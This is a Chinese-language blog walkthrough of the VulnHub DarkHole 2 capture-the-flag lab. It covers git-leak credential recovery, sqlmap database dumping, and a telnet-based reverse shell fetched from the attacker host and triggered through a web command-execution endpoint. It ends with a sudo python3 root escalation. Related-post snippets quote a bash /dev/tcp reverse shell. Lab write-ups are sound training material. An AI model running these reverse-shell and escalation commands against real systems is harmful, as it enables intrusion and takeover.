DarkHole_2靶场

已于 2023-06-14 20:13:13 修改
阅读量231 收藏 2
点赞数
分类专栏: vulnhub靶场 文章标签: git 数据库
于 2023-06-14 16:43:57 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/zjxxxy/article/details/131210609
版权
该文章详细描述了一次针对Darkhole2靶机的渗透测试过程,包括网络配置、信息收集、端口扫描、发现Git泄露、利用SQL注入获取数据库信息、SSH登录、寻找flag、反弹shell以及最终的权限提升至rootshell。
摘要由CSDN通过智能技术生成

一、靶场介绍

1.下载地址:https://www.vulnhub.com/entry/darkhole-2,740/
2.将靶机网络适配器改为NAT模式
在这里插入图片描述
3.启动靶机

二、信息收集

1.主机发现

nmap -sn 192.168.111.1/24

在这里插入图片描述

2.端口扫描

nmap -p 1-65535 -A 192.168.111.132

在这里插入图片描述

3.访问网页,发现有login界面,但没有用户名密码

在这里插入图片描述

4.扫描发现存在.git泄露,浏览器访问

在这里插入图片描述

三、渗透流程

1.下载git泄露源码
在这里插入图片描述
2.发现了mysql连接的用户名,但没有密码
在这里插入图片描述
3.查看日志,发现更新了login.php的版本
在这里插入图片描述
4.查看两个版本的区别,发现删除了一个用户,用户名为:lush@admin.com;密码为:321
在这里插入图片描述

5.使用lush@admin.com用户登录,判断其可能存在sql注入
在这里插入图片描述
6.尝试使用sqlmap爆破数据库

sqlmap -r sql.txt -D darkhole_2 --dump-all --batch

在这里插入图片描述
7.尝试ssh账号登录,账号:jehad密码:fool

ssh jehad@192.168.111.132

在这里插入图片描述
8.找寻目录,发现flag
在这里插入图片描述
9.查询计划任务

cat /etc/crontab

在这里插入图片描述
在/opt/web目录下发现index.php
在这里插入图片描述
查看历史命令执行
在这里插入图片描述
10.使用kali生成反弹shell,并开启http服务

echo 'mknod a p; telnet 192.168.111.129 6666 0<a /bin/bash 1>a' > exp
python3 -m http.server 8080

在这里插入图片描述
11.靶机下载shell

wget 192.168.111.129:8080/exp

在这里插入图片描述
12.kali开启监听,靶机将exp移动到/tmp目录下执行

nc -lvvp 6666
mv exp /tmp/exp
curl "http://localhost:9999/?cmd=bash%20/tmp/exp"

在这里插入图片描述
在这里插入图片描述
13.进入终端shell
在这里插入图片描述
查看历史命令,发现其密码为:gang

cat .bash_history

在这里插入图片描述
14.sudo执行python3切换到root shell,提权成功

sudo python3 -c 'import os; os.setuid(0); os.system("/bin/sh")'

在这里插入图片描述

zjxxxy
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
移动安全_漏洞靶场_Android应用层漏洞.zip
01-14
靶场,是指为信息安全人员提供实战演练、渗透测试和攻防对抗等训练环境的虚拟或实体场地。在不同的领域中,靶场扮演着重要的角色,尤其是在网络安全领域,靶场成为培养和提高安全专业人员技能的重要平台。 首先,...
VulnHub-DarkHole_2靶机实战(超详细保姆级教程)
精品博客,你值得一看~
08-13 4361
记得我们查看过9999端口运行的程序,当我们看到源代码的内容时,我们看到这允许远程命令执行。bash -c ‘bash -i >& /dev/tcp/192.168.184.156/9001 0>&1’ #记得修改你的IP。id=1' and 1=2 --+ #页面信息消失,说明id的闭合为单引号。到此,我们就可以进行ssh连接了.下面是拓展工具注入的方式.着急看结果的宝宝们可以直接移步下面的ssh连接步骤.
看完这篇 教你玩转渗透测试靶机vulnhub—DarkHole2
Aluxian_的博客
05-31 1122
vulnhub是个提供各种漏洞平台的综合靶场,可供下载多种虚拟机进行下载,本地VM打开即可,像做游戏一样去完成渗透测试、提权、漏洞利用、代码审计等等有趣的实战。这是一个漏洞靶机,老样子需要找到flag即可。这个靶机难度适中。
Dark_hole2靶机实战——详细版
qq_74243714的博客
07-02 591
Sorry, user jehad may not run sudo on darkhole.(不可 sudo提权)--------------计划任务提权-------------sudo -l (发现不能够使用sudo,因为没有losy密码)发现修改历史中有账号和密码,以及dashboard.php页面。方法二:josy用户退回到根目录查看所有文件(包括隐藏文件)SSH登录losy用户(sudo提权)发现账号管理页面,可以修改账号信息。方法一:想到爆破密码(一般不建议)获取到SSH用户密码!
VulnHub-DarkHole_2靶机实战(超详细保姆级教程)(1),2024互联网大厂网络安全面经合集
2301_77116622的博客
04-14 1087
对于从来没有接触过网络安全的同学,我们帮你准备了详细的学习成长路线图。可以说是最科学最系统的学习路线,大家跟着这个大的方向学习准没问题。可以说是最科学最系统的学习路线,大家跟着这个大的方向学习准没问题。id=1’ and 1=2 --+ #页面信息消失,说明id的闭合为单引号。到此,我们就可以进行ssh连接了.下面是拓展工具注入的方式.着急看结果的宝宝们可以直接移步下面的ssh连接步骤.两款工具达成的效果是一致的,大家自行选择喜欢的工具即可。
DarkHole 2靶场详细教学
weixin_60374959的博客
11-22 698
本次靶场所运用到的知识点1.源码分析(.git信息泄露)2.sql注入3.sudo提权(.bash_histroy历史命令提权)
DVWA-master.zip_DVWA_php_漏洞_靶场
09-24
php攻防练习靶场,多种漏洞组合,练习代码审计,避免开发出现漏洞
JAVA__安全靶场,IAST_测试用例,JAVA漏洞复现,代码审计,SAST测试用例,被动扫描,J_JavaVul.zip
08-28
JAVA__安全靶场,IAST_测试用例,JAVA漏洞复现,代码审计,SAST测试用例,被动扫描,J_JavaVul
内网渗透实战——红日ATT&CK系列靶场(一)学习笔记_红日靶场1攻略-CSDN博客.html
05-11
内网渗透实战——红日ATT&CK系列靶场(一)学习笔记_红日靶场1攻略-CSDN博客.html
VulnHub-DarkHole_2靶机实战(超详细保姆级教程)(1)
m0_60721907的博客
04-08 928
当我学到一定基础,有自己的理解能力的时候,会去阅读一些前辈整理的书籍或者手写的笔记资料,这些笔记详细记载了他们对一些技术点的理解,这些理解是比较独到,可以学到不一样的思路。网安所有方向的技术点做的整理,形成各个领域的知识点汇总,它的用处就在于,你可以按照上面的知识点去找对应的学习资源,保证自己学得较为全面。观看零基础学习视频,看视频学习是最快捷也是最有效果的方式,跟着视频中老师的思路,从基础到深入,还是很容易入门的。两款工具达成的效果是一致的,大家自行选择喜欢的工具即可。
[渗透测试学习靶机05] vulnhub靶场 DarkHole: 2
weixin_47112073的博客
10-19 1417
vulnhub靶场 DarkHole: 2,难度:困难级别
vulnhub靶场————darkhole 2
m0_65809311的博客
08-17 1095
nmap 、gitgit log git checkout ) 、 linux提权命令 、 python提权命令·.bash_history文件这次靶场主要是学习了文件,命令等基础知识。思路还是很简单的。
Neos的渗透测试靶机练习——DarkHole-2
qq_38678845的博客
01-22 1119
一次渗透测试靶机练习
DarkHole2 vulnhub靶场
weixin_62621015的博客
03-16 255
DarkHole2 vulnhub靶场个人通关笔记 不是很难
【Vulnhub靶场DARKHOLE: 2
DG_s1mple
03-23 1614
环境准备 下载靶机导入到vmware 攻击机IP为:192.168.2.18 靶机的IP为:192.168.2.16 信息收集 我们首先使用nmap扫描一下靶机开放的端口信息 发现只开放了ssh跟http服务,我们首先访问一下他的网站 有一个登录界面,其他并无什么有用信息 渗透开始 网站页面没有什么有用信息,我们扫描一下网站的目录 有.git泄露,我们使用工具把它下载下来 看看git的日志 发现有修改过login.php文件,我们回到这次缓存 获得网站后台的账号密码,我们去登录一下 发现这里
靶机:darkhole_2
weixin_50339323的博客
09-09 1488
一、信息搜集 1. 获取IP nmap -sP 192.168.8.0/24 获取的IP:192.168.8.139 2. 扫描IP端口服务 nmap -sC -sV 192.168.8.139 3.目录探测: gobuster dir -q -u http://192.168.8.139 -w /usr/share/seclists/Discovery/Web-Content/common.txt 二、漏洞挖掘 1. 进入到网页 访问 192.168.8.139...
git pull之后发现项目错误,如何回到之前的版本方法
最新发布
maliao5的博客
09-09 319
目录首先我们打开小程序的cmd的黑窗口,git reflog查看之前的版本之后再git reset --hard main@{1}我这个就已经返回了之前的6daaa2e的版本了
kali2021.3安装DVWA靶场教程
"kali2021.3安装dvwa靶场" 在本文中,我们将详细探讨如何在Kali Linux 2021.3版本上安装DVWA(Damn Vulnerable Web Application)靶场,这对于初学者进行Web渗透测试是非常有帮助的。DVWA是一个开源的、易受攻击的...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值